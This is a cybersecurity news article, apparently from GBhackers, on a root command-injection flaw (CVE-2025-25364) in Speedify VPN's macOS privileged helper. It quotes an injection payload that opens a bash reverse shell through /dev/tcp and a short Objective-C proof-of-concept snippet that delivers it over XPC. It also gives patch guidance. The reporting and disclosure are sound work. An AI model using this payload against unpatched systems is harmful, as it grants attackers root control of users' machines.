Tuesday, May 6, 2025
HomeCVE/vulnerabilitySpeedify VPN Vulnerability on macOS Exposes Users to System Takeover

Speedify VPN Vulnerability on macOS Exposes Users to System Takeover

Published on

SIEM as a Service

Follow Us on Google News

A major security flaw in the Speedify VPN application for macOS, tracked as CVE-2025-25364, has exposed millions of users to the risk of complete system compromise.

Researchers at SecureLayer7 discovered the vulnerability in Speedify’s privileged helper tool. It could potentially allow local attackers to execute arbitrary commands as root and take total control of affected systems.

CVE-2025-25364: A Critical Command Injection Vulnerability

The root of the problem lies within the me.connectify.SMJobBlessHelper XPC service—a helper tool that runs with elevated (root) privileges to perform system-level network operations for Speedify.

- Advertisement - Google News

This service, installed as a privileged daemon via /Library/PrivilegedHelperTools/me.connectify.SMJobBlessHelper, is configured to receive and process commands from the main Speedify app via Apple’s XPC messaging system.

AspectDetails
CVE IDCVE-2025-25364
Affected ProductSpeedify VPN
Affected Version15.0.0 (macOS)
Patched Version15.4.1
Componentme.connectify.SMJobBlessHelper (Privileged Helper Tool at /Library/PrivilegedHelperTools/)
Vulnerability TypeCommand Injection

Due to improper input validation, particularly of the cmdPath and cmdBin fields in incoming XPC messages, a local attacker can craft a malicious payload.

These fields are directly embedded into the command execution logic without sanitization, enabling an attacker to inject arbitrary shell commands, which the helper tool then executes with root privileges.

Three key functions are at the heart of this vulnerability:

  1. XPC Message Handler: Accepts and parses incoming XPC messages, directing those with a “runSpeedify” request to a launch handler with no input validation.
  2. _handleLaunchSpeedifyMsg: Extracts cmdPath and cmdBin directly from the input and initiates program execution.
  3. _RunSystemCmd: Constructs a shell command from these fields and calls system() to execute it. This line illustrates the injection risk:

rax = asprintf(&var_38, “codesign -v -R=\”certificate leaf[subject.CN] = \”%s\” and anchor apple generic\” \”%s\””, “…”, rcx);

A threat actor can set cmdBin or cmdPath to a string such as “; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo ” to open a root shell connection to an external server.

Researchers released a proof-of-concept (PoC) exploit written in Objective-C, using the XPC APIs to connect to the vulnerable helper and send a crafted payload.

The payload triggers arbitrary code execution as root, such as spawning a reverse shell. Here’s a relevant snippet:

xpc_dictionary_set_string(message, "cmdPath", "/tmp");

const char *injectionPayload = "\"; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo \"";

xpc_dictionary_set_string(message, "cmdBin", injectionPayload);

The impact of this flaw is critical: an attacker with local access could gain full root control, modify sensitive files, install persistent malware, and exfiltrate data.

Since most Speedify VPN users rely on the app for privacy, this vulnerability could have undermined the security of a broad user base.

Speedify users are strongly advised to upgrade to version 15.4.1 or above, which addresses the flaw with a complete helper tool rewrite, stricter input validation, and the removal of insecure XPC handling.

The incident highlights the paramount importance of rigorous input validation in all privileged code.

Find this News Interesting! Follow us on Google NewsLinkedIn, & X to Get Instant Updates!

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

BFDOOR Malware Targets Organizations to Establish Long-Term Persistence

The BPFDoor malware has emerged as a significant threat targeting domestic and international organizations,...

Uncovering the Security Risks of Data Exposure in AI-Powered Tools like Snowflake’s CORTEX

As artificial intelligence continues to reshape the technological landscape, tools like Snowflake’s CORTEX Search...

UNC3944 Hackers Shift from SIM Swapping to Ransomware and Data Extortion

UNC3944, a financially-motivated threat actor also linked to the group known as Scattered Spider,...

Over 2,800 Hacked Websites Targeting MacOS Users with AMOS Stealer Malware

Cybersecurity researcher has uncovered a massive malware campaign targeting MacOS users through approximately 2,800...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

BFDOOR Malware Targets Organizations to Establish Long-Term Persistence

The BPFDoor malware has emerged as a significant threat targeting domestic and international organizations,...

Uncovering the Security Risks of Data Exposure in AI-Powered Tools like Snowflake’s CORTEX

As artificial intelligence continues to reshape the technological landscape, tools like Snowflake’s CORTEX Search...

UNC3944 Hackers Shift from SIM Swapping to Ransomware and Data Extortion

UNC3944, a financially-motivated threat actor also linked to the group known as Scattered Spider,...